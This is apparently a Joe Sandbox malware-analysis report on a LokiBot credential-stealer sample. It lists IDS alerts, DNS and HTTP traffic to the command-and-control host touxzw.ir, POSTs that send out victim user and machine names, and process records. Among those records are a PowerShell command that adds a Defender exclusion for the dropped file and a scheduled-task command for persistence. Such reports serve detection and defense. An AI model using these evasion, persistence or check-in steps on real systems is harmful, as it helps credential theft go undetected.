2024-12-03T17:14:19.561668+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49763	172.67.134.88	80	TCP
2024-12-03T17:14:19.561668+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49763	172.67.134.88	80	TCP
2024-12-03T17:14:19.561668+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49763	172.67.134.88	80	TCP
2024-12-03T17:14:20.808835+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49763	172.67.134.88	80	TCP
2024-12-03T17:14:20.808835+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49763	172.67.134.88	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 17:14:14.642833948 CET	49749	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:14.763175011 CET	80	49749	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:14.763264894 CET	49749	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:14.765867949 CET	49749	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:14.886976004 CET	80	49749	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:14.887037039 CET	49749	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:15.007615089 CET	80	49749	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:16.043881893 CET	80	49749	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:16.044187069 CET	49749	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:16.045269012 CET	80	49749	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:16.045443058 CET	49749	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:16.164102077 CET	80	49749	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:16.173576117 CET	49751	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:16.296272039 CET	80	49751	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:16.296751022 CET	49751	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:16.298551083 CET	49751	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:16.418540955 CET	80	49751	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:16.418642998 CET	49751	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:16.538639069 CET	80	49751	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:17.626003981 CET	80	49751	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:17.626140118 CET	49751	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:17.626861095 CET	80	49751	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:17.626925945 CET	49751	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:17.690290928 CET	49757	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:17.746313095 CET	80	49751	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:17.810447931 CET	80	49757	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:17.810628891 CET	49757	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:17.812812090 CET	49757	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:17.932861090 CET	80	49757	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:17.932918072 CET	49757	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:18.054331064 CET	80	49757	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:19.163358927 CET	80	49757	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:19.163446903 CET	80	49757	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:19.163528919 CET	49757	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:19.163530111 CET	49757	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:19.283655882 CET	80	49757	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:19.315701962 CET	49763	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:19.436151028 CET	80	49763	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:19.436544895 CET	49763	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:19.438786030 CET	49763	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:19.559025049 CET	80	49763	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:19.561667919 CET	49763	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:19.682382107 CET	80	49763	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:20.808182955 CET	80	49763	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:20.808783054 CET	80	49763	172.67.134.88	192.168.2.5
Dec 3, 2024 17:14:20.808835030 CET	49763	80	192.168.2.5	172.67.134.88
Dec 3, 2024 17:14:21.559348106 CET	49763	80	192.168.2.5	172.67.134.88

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 17:14:14.204163074 CET	60076	53	192.168.2.5	1.1.1.1
Dec 3, 2024 17:14:14.637042999 CET	53	60076	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 3, 2024 17:14:14.204163074 CET	192.168.2.5	1.1.1.1	0x722f	Standard query (0)	touxzw.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 3, 2024 17:14:02.018245935 CET	1.1.1.1	192.168.2.5	0xf27e	No error (0)	shed.dual-low.s-part-0033.t-0009.t-msedge.net	s-part-0033.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 3, 2024 17:14:02.018245935 CET	1.1.1.1	192.168.2.5	0xf27e	No error (0)	s-part-0033.t-0009.t-msedge.net		13.107.246.61	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:14:14.637042999 CET	1.1.1.1	192.168.2.5	0x722f	No error (0)	touxzw.ir		172.67.134.88	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:14:14.637042999 CET	1.1.1.1	192.168.2.5	0x722f	No error (0)	touxzw.ir		104.21.25.154	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

touxzw.ir

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49749	172.67.134.88	80	2568	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 17:14:14.765867949 CET	239	OUT	POST /sirr/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 66673698 Content-Length: 180 Connection: close
Dec 3, 2024 17:14:14.887037039 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons899552ALFONS-PCk0FDD42EE188E931437F4FBE2CKb9SQ
Dec 3, 2024 17:14:16.043881893 CET	944	IN	HTTP/1.1 521 Date: Tue, 03 Dec 2024 16:14:15 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxGNlIksFLfDMGSH3cnQ1gHF2tsxhhq8k30wEOpDNQCO9uLM7F2YyjzIHiapO2AE8wu%2BepfREr%2BpWvlWY3tdQ5derymKfrPdKjWEjO5BwwomBP3EhTZhqK5UyQk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ec4d9441d5e42df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=419&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49751	172.67.134.88	80	2568	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 17:14:16.298551083 CET	239	OUT	POST /sirr/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 66673698 Content-Length: 180 Connection: close
Dec 3, 2024 17:14:16.418642998 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons899552ALFONS-PC+0FDD42EE188E931437F4FBE2CloSl9
Dec 3, 2024 17:14:17.626003981 CET	948	IN	HTTP/1.1 521 Date: Tue, 03 Dec 2024 16:14:17 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihWWsdyyS%2FRVM5FP6er55doB5igXAkL8kbTDh%2FPapJdWEY0foOlwpKaCxB0ZLMI7zSi%2FXjR54YNwL1pSzixuhHdAlUKl9cPQb4sptHPypyWJVzSj5D%2FtCDZKfQM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ec4d94de896ef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1812&rtt_var=906&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=419&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49757	172.67.134.88	80	2568	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 17:14:17.812812090 CET	239	OUT	POST /sirr/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 66673698 Content-Length: 153 Connection: close
Dec 3, 2024 17:14:17.932918072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons899552ALFONS-PC0FDD42EE188E931437F4FBE2C
Dec 3, 2024 17:14:19.163358927 CET	950	IN	HTTP/1.1 521 Date: Tue, 03 Dec 2024 16:14:19 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCmaTHogb1uFc9slhqrCDv7YIhxt2z9n8axfem%2FljQKe7xpEhsVFD9Y7%2F45aFYkA34J4pmyqy6eq0NAw7RTB91h%2FAiTAzFh2EhyPZxKB%2F82gFPKbf8Vplz%2BsIwQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ec4d9576ea8727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1895&min_rtt=1895&rtt_var=947&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49763	172.67.134.88	80	2568	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 17:14:19.438786030 CET	239	OUT	POST /sirr/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 66673698 Content-Length: 153 Connection: close
Dec 3, 2024 17:14:19.561667919 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons899552ALFONS-PC0FDD42EE188E931437F4FBE2C
Dec 3, 2024 17:14:20.808182955 CET	950	IN	HTTP/1.1 521 Date: Tue, 03 Dec 2024 16:14:20 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yf%2FKdAIJpywDWudR6aoi9S9GcowlKM7RICmNz%2BelstigrHjWlrvvbg%2FP6ftkzl3ZlU%2FSuQYtKZiYsoRUzIn8yrhoswv0jIbUaUJ1A7JtsvUES%2Bpqny51vwarClA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ec4d961e85a03d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31 Data Ascii: error code: 521

Target ID:	0
Start time:	11:14:04
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\LEmJJ87mUQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LEmJJ87mUQ.exe"
Imagebase:	0xd40000
File size:	613'384 bytes
MD5 hash:	7E1D910ADE786C9880194CE5E7C66C8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:14:10
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"
Imagebase:	0x2f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:14:10
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:14:10
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"
Imagebase:	0x4d0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:14:10
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:14:11
Start date:	03/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x3c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:14:11
Start date:	03/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xba0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000008.00000002.2395876159.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:14:12
Start date:	03/12/2024
Path:	C:\Users\user\AppData\Roaming\aWBoUwiux.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\aWBoUwiux.exe
Imagebase:	0x560000
File size:	613'384 bytes
MD5 hash:	7E1D910ADE786C9880194CE5E7C66C8B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:14:13
Start date:	03/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:14:20
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp"
Imagebase:	0x4d0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:14:20
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:14:21
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1788
Imagebase:	0xf00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	155
Total number of Limit Nodes:	5

Executed Functions

Function 056A2D18 Relevance: 1.6, Strings: 1, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*, xrefs: 056A3054

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: d2114ecd65ee1c39ef2b85f9e07837857e165d6e7d6f757d02c01b378b51fdb4
Instruction ID: e8950e4fcb9f4d94a6572d3230fe85a1d2468acd46ffa124a2996e11ed07bbb3
Opcode Fuzzy Hash: d2114ecd65ee1c39ef2b85f9e07837857e165d6e7d6f757d02c01b378b51fdb4
Instruction Fuzzy Hash: 2DF1DD75E01268CFDB24CFA9C984B9EBBB2BF49301F1484AAD409AB351D7749E85CF50

Function 07B09B00 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

